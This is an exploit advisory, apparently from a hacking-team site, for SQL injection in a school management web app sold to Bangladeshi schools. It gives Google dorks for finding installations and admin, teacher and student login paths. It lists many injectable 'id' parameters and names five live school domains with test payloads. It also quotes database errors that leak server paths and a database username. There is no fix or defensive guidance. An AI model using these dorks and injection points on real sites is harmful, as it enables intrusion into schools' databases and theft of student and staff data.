facebook facebook twitter rss

Soft IT Security Hululu IT Bangladesh SQL Injection Vulnerability

Author: KingSkrupellos , Published: 11-01-2019
###############################################################

# Exploit Title : Soft IT Security Hululu IT Bangladesh SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 08/01/2019
# Vendor Homepage : softitsecurity.com ~ hululuit.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Google Dorks : intext:''© Copyright 2019. Designed and
Developed by Soft IT Security'' site:edu.bd
intext:''© Copyright 2019. Designed and Developed by Hululu IT'' site:edu.bd
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
# Cyberizm Exploit Reference Link :
cyberizm.org/cyberizm-soft-it-security-hululu-it-bangladesh-sql-injection.html

###############################################################

Admin/Teacher/Student Panel Login Path =>

/adminoperation/
/teacheroperation/
/studentoperation/

# SQL Injection Exploits :
**********************

/?v=home.jsp&id=[SQL Injection]

/?v=administrationdeatils.jsp&id=[SQL Injection]

/?v=allteacher.jsp&id=[SQL Injection]

/?v=allclark.jsp&id=[SQL Injection]

/?v=talentstudent-detail.jsp&id=[SQL Injection]

/?v=allstudent.jsp&id=[SQL Injection]

/?v=boardresultdetails.jsp&id=1%27

/?v=universitydetails.jsp&id=[SQL Injection]

/?v=talentteacher-detail.jsp&id=[SQL Injection]

/?v=academiccalender-details.jsp&id=[SQL Injection]

/?v=allevent.jsp&id=[SQL Injection]

/?v=allresult.jsp&id=[SQL Injection]

/?v=noticebord-detail.jsp&id=[SQL Injection]

/?v=uploadbook-details.jsp&id=[SQL Injection]

/?v=usefulllinkdetails.jsp&id=[SQL Injection]

/?v=checkclass.jsp&id=[SQL Injection]

###############################################################

# Example Vulnerable Sites =>
***************************

Note : (192.185.94.62) => There are 182 domains hosted on this server.

[+] birgardusafiaalimmadrasah.edu.bd/?v=administrationdeatils.jsp&id=3%27

[+] haripuralimmadrasha.edu.bd/?v=administrationdeatils.jsp&id=3%27

[+] tislamunionhighschool.edu.bd/?v=administrationdeatils.jsp&id=3%27

[+] haripurwomenscollege.edu.bd/?v=administrationdeatils.jsp&id=3%27

[+] jamunhndm.edu.bd/?v=administrationdeatils.jsp&id=3%27

###############################################################

# SQL Database Error :
*********************

Deprecated: mysql_connect(): The mysql extension is deprecated and
will be removed in the future: use mysqli or PDO instead in /home/birgardusafiaali
/public_html/DAL/DbConnect.php on line 8

Warning: mysql_connect(): Access denied for user 'birgardu_school'@'localhost'
(using password: YES) in /home/birgardusafiaali/public_html/DAL/DbConnect.php on line 8

Warning: fread(): Length parameter must be greater than 0 in
/home/haripuralimmadra/public_html/controller/function.php on line 220

###############################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

###############################################################

Like us on Facebook :